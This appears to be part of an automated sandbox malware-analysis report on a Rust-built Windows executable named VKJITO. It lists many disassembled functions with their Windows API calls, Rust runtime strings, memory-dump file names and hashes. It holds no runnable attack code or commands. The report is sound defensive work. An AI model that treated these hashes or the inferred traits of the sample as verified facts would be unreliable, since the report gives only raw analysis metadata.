                                      • Instruction ID: 2d5a7d28780fb63f4e0e9beb36e54f9200154a34774746b7bdf7aa17595bee74
                                      • Opcode Fuzzy Hash: 452feccd1db8fa0d10035c291713d94de8059aca1dfa39c42d016ee7b47553d7
                                      • Instruction Fuzzy Hash: B6A1E463A18BC582EA459F19E4453FEA364FF54B88F859336DE4D13261DF39E296C300
                                      Function 00007FF7D4349E80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D434A08E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 1956605914-1397643090
                                      • Opcode ID: 5a122f9f142afb16b5a4d8ebf21f475bc3e017c8cc945f0c63b5290871851e56
                                      • Instruction ID: 45165381ada8725cda737bc69821b2b63efdc19878e165d025e21349145b9ef3
                                      • Opcode Fuzzy Hash: 5a122f9f142afb16b5a4d8ebf21f475bc3e017c8cc945f0c63b5290871851e56
                                      • Instruction Fuzzy Hash: 28518722A0868246F724AF2AF8843FEE651FF44780FD4413AD68D56AE5DF7CD585C720
                                      Function 00007FF7D43400C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                      • API String ID: 667068680-1826242509
                                      • Opcode ID: 9cb1ce57ebf45a7dd8a54e90391759f1f960326fe86313774f816689af570da8
                                      • Instruction ID: d0630b5cc5eea05542aa3ca0609f1d00d60325b3569032be3ecda023af40aa4e
                                      • Opcode Fuzzy Hash: 9cb1ce57ebf45a7dd8a54e90391759f1f960326fe86313774f816689af570da8
                                      • Instruction Fuzzy Hash: 88F03024B0A61651F909BF1FEDC517CA6B4AF44B80FC4443EC85D26354EE2CA6558320
                                      Function 00007FF7D431FEB0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 222stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: lstrlenmemcmp
                                      • String ID: RUST_BACKTRACEfailed to write the buffered data$TryFromIntError:$called `Result::unwrap()` on an `Err` value
                                      • API String ID: 1799893992-2411252233
                                      • Opcode ID: 809e7a324e1954ebd168fc0d20ed88300d44aa91d385dd5efaae873b659a1ca5
                                      • Instruction ID: 0b7309b06b239cd7c909cccc07c774a5da676ed336226234eed75e6bb7182cb1
                                      • Opcode Fuzzy Hash: 809e7a324e1954ebd168fc0d20ed88300d44aa91d385dd5efaae873b659a1ca5
                                      • Instruction Fuzzy Hash: 8D81E622B04A4695EB10AF6AD4806BDB770BB447A8FD0463ADF6D23BD4DF78E545C320
                                      Function 00007FF7D4337B40 Relevance: 9.1, APIs: 6, Instructions: 79timesleepsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWaitableTimerExW.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF7D432D8DE,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D4337B6A
                                      • SetWaitableTimer.KERNEL32 ref: 00007FF7D4337BC0
                                      • WaitForSingleObject.KERNEL32 ref: 00007FF7D4337BD2
                                      • CloseHandle.KERNEL32 ref: 00007FF7D4337BDD
                                      • CloseHandle.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF7D432D8DE,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D4337BED
                                      • Sleep.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF7D432D8DE,?,?,?,?,?,?,00007FF7D4325140), ref: 00007FF7D4337C39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                      • String ID:
                                      • API String ID: 2261246915-0
                                      • Opcode ID: df4b7c4e0f28b5898b2a4717a009eac63ad23da5c5733a5e467018da1cae4ee1
                                      • Instruction ID: 784dc4e45e91531efefabc0a0686e85c7ca5f2b11ab52e2201fc2cac053cea71
                                      • Opcode Fuzzy Hash: df4b7c4e0f28b5898b2a4717a009eac63ad23da5c5733a5e467018da1cae4ee1
                                      • Instruction Fuzzy Hash: 37212621B0A64642EE5CBF6AF8A973C95156B85BA0FC4833EC91F227E0DF2C64018350
                                      Function 00007FF7D4349B40 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 212COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF7D4349DC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: Handle$CloseConsoleErrorLastMode
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 1170577072-1397643090
                                      • Opcode ID: eb62733882b7c0ab55a34bfb60a3079ab1270fec595ba0a6c5474c5b93849ba0
                                      • Instruction ID: 6e2d2880eb952fe6141141f8504e8ca51397d77a34260ab9b260465a928f9e57
                                      • Opcode Fuzzy Hash: eb62733882b7c0ab55a34bfb60a3079ab1270fec595ba0a6c5474c5b93849ba0
                                      • Instruction Fuzzy Hash: AE918762A08A5294EB11EF7AE8803FCA760AB05798FC4853BDD5D276D9DF3C9185C320
                                      Function 00007FF7D433D040 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 2744335978-1397643090
                                      • Opcode ID: 7c3477d1440f9c9d02e5db5797094c3e8b381a7f62c2a024411e651ed6f10cdf
                                      • Instruction ID: e516302a37487ab5bd85338b4b869f70b0a85198decc8deea3e040fd5806d815
                                      • Opcode Fuzzy Hash: 7c3477d1440f9c9d02e5db5797094c3e8b381a7f62c2a024411e651ed6f10cdf
                                      • Instruction Fuzzy Hash: 9DB12A62608FC18CE7719F25DC843EE77A0FB05359F84412ADA4C6BB99DF399288CB10
                                      Function 00007FF7D433CC10 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 153COMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF7D433CE9F), ref: 00007FF7D433CC46
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF7D433CE9F), ref: 00007FF7D433CDC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorFrequencyLastPerformanceQuery
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                      • API String ID: 3362413890-3176237871
                                      • Opcode ID: b0c4265b50fde610299b718220bcee1048d1fa352833f161786620d388aecadf
                                      • Instruction ID: 6d5502c4283320bb2f03e6f8db35d61434e9cedc21aa5bebf41837b8231a0530
                                      • Opcode Fuzzy Hash: b0c4265b50fde610299b718220bcee1048d1fa352833f161786620d388aecadf
                                      • Instruction Fuzzy Hash: 4F51E523B0864255FB14FF6ED8982BDA765AF44794FC4813BE90E23AD4DE3CA545C620
                                      Function 00007FF7D433C8B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 00007FF7D433C920
                                      • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF7D433CA62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ExclusiveLock$Release$Acquire
                                      • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs
                                      • API String ID: 1021914862-480352821
                                      • Opcode ID: ac3503c6af596cc8bccbc3749bdf567994a8dcfa19e4d4bec1c1b5b33ab120c4
                                      • Instruction ID: 5bd7633b80bcd1a4629c0587ff0cac7c047fa03b775fa48492ba211a8beb079b
                                      • Opcode Fuzzy Hash: ac3503c6af596cc8bccbc3749bdf567994a8dcfa19e4d4bec1c1b5b33ab120c4
                                      • Instruction Fuzzy Hash: 9B512C21E08A4686FB14FF1ED8843BCA760BB56719FC4423BD9DD262A1DF3CA585C720
                                      Function 00007FF7D434B720 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtReleaseKeyedEvent$ntdll
                                      • API String ID: 1646373207-2191064745
                                      • Opcode ID: ecddea4fa7d1f352d0c3e4c62c3031562dbacd438e9a8043134616b1bb2bd14f
                                      • Instruction ID: 524c07ba31498af3be39d25065e28e2324a369a851a21c12669fea2b3039e349
                                      • Opcode Fuzzy Hash: ecddea4fa7d1f352d0c3e4c62c3031562dbacd438e9a8043134616b1bb2bd14f
                                      • Instruction Fuzzy Hash: 79117521B14B4694F604FF2AECC06ACA7A4BB58794FC5423ADD5C23B54EF3C9185C710
                                      Function 00007FF7D434B800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtWaitForKeyedEvent$ntdll
                                      • API String ID: 1646373207-615976147
                                      • Opcode ID: 3ccd51594901d1869b000309158222a762aefc6accd8e77d49a7e69a880a248d
                                      • Instruction ID: dbc0c21207af599b2398cada14aa5d9069477fd8f1740ad54c580560c90ad0f4
                                      • Opcode Fuzzy Hash: 3ccd51594901d1869b000309158222a762aefc6accd8e77d49a7e69a880a248d
                                      • Instruction Fuzzy Hash: 4F117521B14B5694F604FF6AECC06ACA7A4BB58764FC4423ADD5C22B54EF3CA185C710
                                      Function 00007FF7D43381F0 Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$EnvironmentVariable
                                      • String ID:
                                      • API String ID: 2691138088-0
                                      • Opcode ID: c15820f9f92ae5b14e7bd5bff7fe94e6e5aa0ab046b15112c40e521cd23fedab
                                      • Instruction ID: 0ecba2f9a75cd59accf0f62c180ec96aaa6c5b20c7a88a87b861efb92ce2c743
                                      • Opcode Fuzzy Hash: c15820f9f92ae5b14e7bd5bff7fe94e6e5aa0ab046b15112c40e521cd23fedab
                                      • Instruction Fuzzy Hash: 05710952A04BC186EB35AF6AD8883EDA390BF14798FD0413ADE5C67B85DF3C92858310
                                      Function 00007FF7D431D2A0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 1956605914-0
                                      • Opcode ID: 8425dd4cfdff9b90003e6f3d06f81a19a64ebf80eaa6ea24fe96e77914645e5d
                                      • Instruction ID: 520797737d1ed035fa8e6db39058b15335c7d441cbc132cbd94299ea4267d419
                                      • Opcode Fuzzy Hash: 8425dd4cfdff9b90003e6f3d06f81a19a64ebf80eaa6ea24fe96e77914645e5d
                                      • Instruction Fuzzy Hash: 2F51CF21E0869285F720AF2AE8843FDA661BB05B94FD0413AD94D67AD8DF3CB5858370
                                      Function 00007FF7D4341810 Relevance: 7.7, APIs: 5, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileModuleName
                                      • String ID:
                                      • API String ID: 1026760046-0
                                      • Opcode ID: 19caae273b0da875c4717bfd7ae77d8c7d472897fcf2e478f70de5f367147e63
                                      • Instruction ID: 253899c09c3093ac6578c60c1e30a996a9bbed706f99d9398c0cf331f18ef8d6
                                      • Opcode Fuzzy Hash: 19caae273b0da875c4717bfd7ae77d8c7d472897fcf2e478f70de5f367147e63
                                      • Instruction Fuzzy Hash: 3551D222A04BC149EB71AF6ADD887FDA654BB05BE4FC0423ADD1D677C5DF3C92848210
                                      Function 00007FF7D4337F90 Relevance: 7.7, APIs: 5, Instructions: 153COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CurrentDirectory
                                      • String ID:
                                      • API String ID: 3993060814-0
                                      • Opcode ID: 3b5a4b8aba8631c9e88389698d2e3385f0d2e61428e341b64a91fff2a58bde37
                                      • Instruction ID: 03d8e00969f9407275b0fb5ebc9a24677a8a4a9ce39b56216f80416a5eaea362
                                      • Opcode Fuzzy Hash: 3b5a4b8aba8631c9e88389698d2e3385f0d2e61428e341b64a91fff2a58bde37
                                      • Instruction Fuzzy Hash: FC51C652A047C15AE775AF6AD9883FDA694BB047E4FC0413ADDAD277C5DF3C92848320
                                      Function 00007FF7D4348BB2 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                      • String ID:
                                      • API String ID: 3697983210-0
                                      • Opcode ID: 51a0c76d86c3fd3e5577ca374b4faa03680486a3d5824ff4efeee5572e0a39db
                                      • Instruction ID: 74b39222940950aec57307ecc37513abde77a89a95d2a921129c23eec97eaab3
                                      • Opcode Fuzzy Hash: 51a0c76d86c3fd3e5577ca374b4faa03680486a3d5824ff4efeee5572e0a39db
                                      • Instruction Fuzzy Hash: 4111543560974187FB54AF7AE8853EDA690FB04764FC4063ADAAD567C4CF7CD5448320
                                      Function 00007FF7D433E9A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 232COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ExclusiveLock$AcquireRelease
                                      • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                      • API String ID: 17069307-3513654867
                                      • Opcode ID: ba9ec0ee9d0da0e4b83f2079990da24f05f742cc25d940177cbc998a7be4e648
                                      • Instruction ID: 8ea4ff290c00e8839ce85dce1679dee1755fb6d898ef088db6c794fa0fc27629
                                      • Opcode Fuzzy Hash: ba9ec0ee9d0da0e4b83f2079990da24f05f742cc25d940177cbc998a7be4e648
                                      • Instruction Fuzzy Hash: 8FB16022A08A4299EB21EF2AD4853BDB7A0FB44759FC4413BDA8D23794DF3CE555C360
                                      Function 00007FF7D434B6C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: NtCreateKeyedEvent$ntdll
                                      • API String ID: 1646373207-1373576770
                                      • Opcode ID: 3dd93b3f74e8961d775c3b06a70e0ff517d3f2cf7e37f77eebb61d25acaebb4a
                                      • Instruction ID: 48eddd89526671d5e86ad47a2772a68493150fe7f6dc41106ded03ee69beeff4
                                      • Opcode Fuzzy Hash: 3dd93b3f74e8961d775c3b06a70e0ff517d3f2cf7e37f77eebb61d25acaebb4a
                                      • Instruction Fuzzy Hash: B1F05E11B0A60251E905BF5BECC05A89A906F59B90EC8443BCD4D63760EE3CA5459320
                                      Function 00007FF7D431DC90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
